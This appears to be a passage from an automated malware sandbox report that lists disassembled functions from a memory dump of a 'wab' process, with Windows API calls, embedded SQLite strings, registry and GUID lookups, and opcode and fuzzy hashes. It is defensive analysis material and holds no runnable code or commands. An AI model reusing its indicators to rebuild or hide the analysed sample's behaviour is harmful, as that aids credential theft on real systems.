                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DFC0126164253032351132152C02ECE5D444D927A9744405BF64871152DE4C092141EE
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041067E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                    • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                                                                                    • API String ID: 2574300362-543337301
                                                                                                                                                                                                                    • Opcode ID: 2e6b26bb17626f4397607e962d7e33e0088331342153929cca1aec3e07a9d3dc
                                                                                                                                                                                                                    • Instruction ID: 89c53fa068d5e839e9f7b52beb2d5746c1b59f0700db89f23453b1bd6c0da6b7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e6b26bb17626f4397607e962d7e33e0088331342153929cca1aec3e07a9d3dc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31D09EB8A00349EFDB00AF21EC0874639946785756B104436A04591267E6B88091CE5D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00431CB5 Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 469COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: rows deleted
                                                                                                                                                                                                                    • API String ID: 2221118986-571615504
                                                                                                                                                                                                                    • Opcode ID: 4c9dbc2b612ed9edf76401e4d6c70ac1deb0b9b48bbb52d81c4a8b84a7a8b6c2
                                                                                                                                                                                                                    • Instruction ID: 2c87624536f7d1d2c67b3f30ed48d8bcf82a012ac595ca9270874480dc5e5985
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c9dbc2b612ed9edf76401e4d6c70ac1deb0b9b48bbb52d81c4a8b84a7a8b6c2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47028F71E00218AFDF14DF99DD81AAEBBB5EF08314F14005AFA04A7352E775AD41CB99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041B58C Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memcmp
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3384217055-0
                                                                                                                                                                                                                    • Opcode ID: e3acc2376955a3743a68dcdfb4fb7f0e30d5fba998ed12fb16b657197a27482f
                                                                                                                                                                                                                    • Instruction ID: 3ed27bb9f02c74045d0acb38b61796dbe98832ce2e8f1163f6a46f85a071a1b4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3acc2376955a3743a68dcdfb4fb7f0e30d5fba998ed12fb16b657197a27482f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C62181B2E106486BDB14DBA5D846EDF73ECEB94704F04082AB511D7241EB38E644C765
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00442878 Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                                                                                    • Opcode ID: 378dd395ac358383f0d1e4d3a7a78962b5737c649db7fc2e5d38c36609a1d53f
                                                                                                                                                                                                                    • Instruction ID: ce7ce7a56e3d2054f407bfc67449f4b5e2a26b1e03fcf19820fefdebefcb5e48
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 378dd395ac358383f0d1e4d3a7a78962b5737c649db7fc2e5d38c36609a1d53f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3312BF4A007008FE7509F7A8945626FBE4FF84315F65886FE259CB2A2D7B9D440CB29
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00404883 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                                                                                    • Opcode ID: a75b1e0acb0f5019c960ead13ae6bdef512e97a5dc6b2f82c9c12f4a65331388
                                                                                                                                                                                                                    • Instruction ID: 580d5568a0ae36357fe55cd2f8a92ca16a000ad3cc3fb0fce8e347f768f52ea1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a75b1e0acb0f5019c960ead13ae6bdef512e97a5dc6b2f82c9c12f4a65331388
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B02160B690115DABDF21EEA8CD40EDF7BADAF88304F0044AAB718E3052D2349F548B64
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040CFC5 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                                                                                    • Opcode ID: c734dfea12c93efd70da344448ab0c1d4400440b23c7d083a28a0ad16e48a0bf
                                                                                                                                                                                                                    • Instruction ID: 593c26daf5a8157ef64f6677eb97e14ee4fb597551c84e1e3d2c0423d94ab2b3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c734dfea12c93efd70da344448ab0c1d4400440b23c7d083a28a0ad16e48a0bf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE01FCB5A40B0077E235AA35CC03F1A73A4AFD1718F000B1EF252666D2E7BCE509856D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041546A Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 211COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: +MA$psow$winOpen
                                                                                                                                                                                                                    • API String ID: 2221118986-3077801942
                                                                                                                                                                                                                    • Opcode ID: 6374b3f40517461fab9b1732b79d6ecb0a63dddf6689f58e7f4b53c344f2d528
                                                                                                                                                                                                                    • Instruction ID: 627c4099ad4ed317c867b58951a0fc316b0cffc8f2319acf44b2ebd0553f51b9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6374b3f40517461fab9b1732b79d6ecb0a63dddf6689f58e7f4b53c344f2d528
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE718D72D00605EBDF10DFA9DC426DEBBB2AF44314F14412BF915AB291D7788D908B98
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0042BB86 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • too many SQL variables, xrefs: 0042BD54
                                                                                                                                                                                                                    • variable number must be between ?1 and ?%d, xrefs: 0042BC19
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                                    • API String ID: 2221118986-515162456
                                                                                                                                                                                                                    • Opcode ID: 6b88ecb26755f537598d44b059ba5a346278a106570852c9337f2aed9016ab7b
                                                                                                                                                                                                                    • Instruction ID: 0d9164a1fdbde5ca3cdd745d30cfe3dc8f536e44641e3c26b790e655cd3eaffd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b88ecb26755f537598d44b059ba5a346278a106570852c9337f2aed9016ab7b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71519D31B00525EFEB19DF69D481BEAB7A0FF08304F90016BE815AB251DB79AD51CBC8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0042F55D Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 143COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: $, $CREATE TABLE
                                                                                                                                                                                                                    • API String ID: 3510742995-3459038510
                                                                                                                                                                                                                    • Opcode ID: 24e9d051a89d5ebfc294a89d8b696b7cb09e4cb3b50fd414110b2fd0402450e3
                                                                                                                                                                                                                    • Instruction ID: 4a0871beed9f250e2dacaf6662beca46c80fe0be2f5bbb48e716de4f7c2f6e71
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24e9d051a89d5ebfc294a89d8b696b7cb09e4cb3b50fd414110b2fd0402450e3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE51B471E00129AFDF10DF94D4815AFB7F5EF45319FA0806BE401EB202E778DA898B99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00402616 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026D6
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040269F
                                                                                                                                                                                                                      • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                                                                                                                                                                                                      • Part of subcall function 0041025A: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                                                                                                                                                                                                      • Part of subcall function 0041025A: memcpy.MSVCRT ref: 004102D6
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040278E
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00402798
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1593657333-0
                                                                                                                                                                                                                    • Opcode ID: 16627343bce6d9ca029ba30bb800e57eeae299e547cd663597d7650a0685579b
                                                                                                                                                                                                                    • Instruction ID: a31c39db536bf59591fe237cfeb45fd52263bcc442a3b4586f9b541b98436b80
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16627343bce6d9ca029ba30bb800e57eeae299e547cd663597d7650a0685579b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0741C2B1408394AFEB21CF60CD85AAB77DCAB49304F04493FF588A21D1D6B9DA44CB5A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040C5D8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C642
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C686
                                                                                                                                                                                                                    • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C6A0
                                                                                                                                                                                                                    • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040C743
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3798638045-0
                                                                                                                                                                                                                    • Opcode ID: 3a7b9920eb43017b966caaa677d6f3b642cf6e436e0306de547793c3a41d1725
                                                                                                                                                                                                                    • Instruction ID: caf6f60f32b19a677c26e4d16bf675fa64e013cae5d841084b333b07d52aaaaa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a7b9920eb43017b966caaa677d6f3b642cf6e436e0306de547793c3a41d1725
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C41C131500216EBCB35CF24C8C5A96BBA4BF05321F1447B6E958AB2D2C7B99D91CFD8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040B340 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00409B5A: ??2@YAPAXI@Z.MSVCRT ref: 00409B7B
                                                                                                                                                                                                                      • Part of subcall function 00409B5A: ??3@YAXPAX@Z.MSVCRT ref: 00409C42
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040B366
                                                                                                                                                                                                                    • atoi.MSVCRT ref: 0040B374
                                                                                                                                                                                                                    • _mbsicmp.MSVCRT ref: 0040B3C7
                                                                                                                                                                                                                    • _mbsicmp.MSVCRT ref: 0040B3DA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4107816708-0
                                                                                                                                                                                                                    • Opcode ID: 8fdabe3cb48b7dd5393ce896bc272b4884b8954cc15d75e5f27a23b60337e2cc
                                                                                                                                                                                                                    • Instruction ID: f56b49caca625ffb6a8305ca332e6707e3f7b6555e2304d22037ac8df505f121
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fdabe3cb48b7dd5393ce896bc272b4884b8954cc15d75e5f27a23b60337e2cc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC412A75900204EBDB10DF69C581A9DBBF4FB48308F2185BAEC55AB397D738DA41CB98
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00443946 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strlen
                                                                                                                                                                                                                    • String ID: >$>$>
                                                                                                                                                                                                                    • API String ID: 39653677-3911187716
                                                                                                                                                                                                                    • Opcode ID: 3bef562ec1fa0c496d1df37275b1e68b1d7bde60f2b1f93b6d17329dd08051c1
                                                                                                                                                                                                                    • Instruction ID: c4e2884265c3a68fdd0446f239628287b972743a9c94721f5bed41ec85a51522
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3bef562ec1fa0c496d1df37275b1e68b1d7bde60f2b1f93b6d17329dd08051c1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A313A5184D2C49EFB119F6880457EEFFB14F22706F1886DAC0D167383C2AC9B4AD75A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040CF27 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                    • Opcode ID: 06b8a3ec594aaba049a721ed4dda8e3acd4ed37df7d7103eefb9391fa1074ca8
                                                                                                                                                                                                                    • Instruction ID: c67b832eded58a7fed5fb718e1005b1d96f95c91eedcc3159726feab918c483c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06b8a3ec594aaba049a721ed4dda8e3acd4ed37df7d7103eefb9391fa1074ca8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB113BF2900705ABCB248F15CCC095A77A9EB94358B00073FFE06562D1E635DA5986DA
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004076FD Relevance: 6.1, APIs: 4, Instructions: 63stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00407709
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00407729
                                                                                                                                                                                                                      • Part of subcall function 00406CCE: malloc.MSVCRT ref: 00406CEA
                                                                                                                                                                                                                      • Part of subcall function 00406CCE: memcpy.MSVCRT ref: 00406D02
                                                                                                                                                                                                                      • Part of subcall function 00406CCE: ??3@YAXPAX@Z.MSVCRT ref: 00406D0B
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040774C
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040776C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1171893557-0
                                                                                                                                                                                                                    • Opcode ID: 362879045fdc860860f3123a44022f3e2572d0f7ada27b379acf8bf4c70500ed
                                                                                                                                                                                                                    • Instruction ID: 5e9a081d75c64704428ce8041afbbeb9d52fcced2ab343c8e96fa08cc39daf7c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 362879045fdc860860f3123a44022f3e2572d0f7ada27b379acf8bf4c70500ed
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E411DF71200600DFD730EF18D981D9AB7F5EF443247108A2EF552A7692C736B919CB54
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00407D33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                                                                                    • Opcode ID: 6af0d80cf1f9a4abb6ff5f9bc8d9616050e1b27e252b80ccf982e962f70df596
                                                                                                                                                                                                                    • Instruction ID: e24a5276dafad98c161ef6ad34afde8f808320b1c4234a0015a7989cc473ef50
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6af0d80cf1f9a4abb6ff5f9bc8d9616050e1b27e252b80ccf982e962f70df596
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12118C71608601AFD328CF2DC881A27F7E9FFD8300B20892EE59A87395DA35E801CB15
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00410880 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SHGetMalloc.SHELL32(?), ref: 00410890
                                                                                                                                                                                                                    • SHBrowseForFolder.SHELL32(?), ref: 004108C2
                                                                                                                                                                                                                    • SHGetPathFromIDList.SHELL32(00000000,?), ref: 004108D6
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004108E9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1479990042-0
                                                                                                                                                                                                                    • Opcode ID: 3753829cb073f40f4471594610d53b7e9f12ad6488aa9b3d51b15237d3a7a1f5
                                                                                                                                                                                                                    • Instruction ID: 22dc721301a1029169844026e50c0f3522bcecfb2be71eae7d1720ca74c813ee
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3753829cb073f40f4471594610d53b7e9f12ad6488aa9b3d51b15237d3a7a1f5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D311FAB5900208AFDB00DFA9D8849EEBBFCFB49314B10406AEA05E7201D774DA45CFA4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040B65E Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                                      • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040B684
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                                                                                                                                                                                                      • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                                      • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040B6AE
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040B6C1
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 203655857-0
                                                                                                                                                                                                                    • Opcode ID: fd7c26483e5a1075d55b25fd65a92633a23fb1db18fe9454acdb9c540dc78240
                                                                                                                                                                                                                    • Instruction ID: c6c9d64871d24126578c2fffe8df42e6a01bd33b4583c5a66007e13a3507ac6b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd7c26483e5a1075d55b25fd65a92633a23fb1db18fe9454acdb9c540dc78240
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA018BB650030467EB21B775CC86FE773ACAB04304F04047BB656F51D3DA79E9848A6D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

